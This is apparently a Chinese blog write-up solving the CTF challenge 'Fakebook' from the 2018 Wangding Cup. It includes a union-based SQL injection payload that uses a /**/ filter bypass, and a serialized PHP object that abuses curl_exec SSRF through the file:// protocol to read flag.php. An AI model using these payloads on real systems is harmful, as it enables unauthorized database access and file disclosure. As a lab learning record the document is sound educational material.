网鼎杯 2018 Fakebook

0x00 初试

在这里插入图片描述
一开始有两个选项:一个join,一个login
在这里插入图片描述
此处blog存在过滤
注册完返回首页发现username栏是超链接
单击后发现
url–>
http://47bdcd94-3a3d-4ae5-af77-4390d01fd436.node4.buuoj.cn:81/view.php?no=1
盲猜是注入(讲真我一开始真没有意识先去判断是数字型注入还是字符型注入)
因为手注测试的时候十分的奇怪…
先通过updatexml报错注入得到一些信息在这里插入图片描述
注注注 得到
database: fakebook
table: user
column: no,username,passwd,data
but报错注入时显示出来的数据有限我觉得很麻烦(group_concat压根不够显示data列的)…感觉不是这个思路
果断看wp了

0x01 复现

首先基本功非常不扎实…就嘎了
再复习一下注入有两个小类是数字型和字符型注入

https://www.php.cn/safe/455989.html

&&做题养成扫目录习惯??(不知道是好是坏,实在没思路就扫一下⑧)
/robots.txt -->user.php.bak
已经可以猜到是反序列化了

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
    
}

补充知识:curl_exec()–>ssrf

curl_exec(); curl支持很多协议,有ftp, ftps, http, https, gopher, telnet, dict, file, ldapa

https://blog.csdn.net/Ethan024/article/details/115827938

本地测试一下

在这里插入图片描述
在这里插入图片描述
done

curl部分函数

】curl_init : 初始化一个cURL会话,供curl_setopt(), curl_exec()和curl_close() 函数使用。
# 初始化一个会话
】curl_setopt : 请求一个url。
# set options 进行一些配置
其中CURLOPT_URL表示需要获取的URL地址,后面就是跟上了它的值。

【*】CURLOPT_RETURNTRANSFER 将curl_exec()获取的信息以文件流的形式返回,而不是直接输出。

【*】curl_exec,成功时返回 TRUE, 或者在失败时返回 FALSE。 然而,如果 CURLOPT_RETURNTRANSFER选项被设置,函数执行成功时会返回执行的结果,失败时返回 FALSE 。

【*】CURLINFO_HTTP_CODE :最后一个收到的HTTP代码。
curl_getinfo:以字符串形式返回它的值,因为设置了CURLINFO_HTTP_CODE,所以是返回的状态码。

原文链接:https://blog.csdn.net/qq_43622442/article/details/105633194

看了dl_wp 是数字型注入(忘了就尬了)
下面很顺畅,常规思路
联合注入就看着很舒服了
tips: union select被过滤了 中间加个注释符/**/就绕过了

payload:
-1%20union/**/select%201,(select(group_concat(concat_ws(%27~%27,no,username,passwd,data)))from(users)),3,4#
在这里插入图片描述
看到第四列data是序列化字符串 ->对应上user.php
显然blog就是我们的利用点了 -->file协议
其实我是真的没扫到flag.php…
payload

$a= new UserInfo();
$a->name='admin';
$a->age=21;
$a->blog='file:///var/www/html/flag.php';
echo(serialize($a));

在这里插入图片描述

在这里插入图片描述

done

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值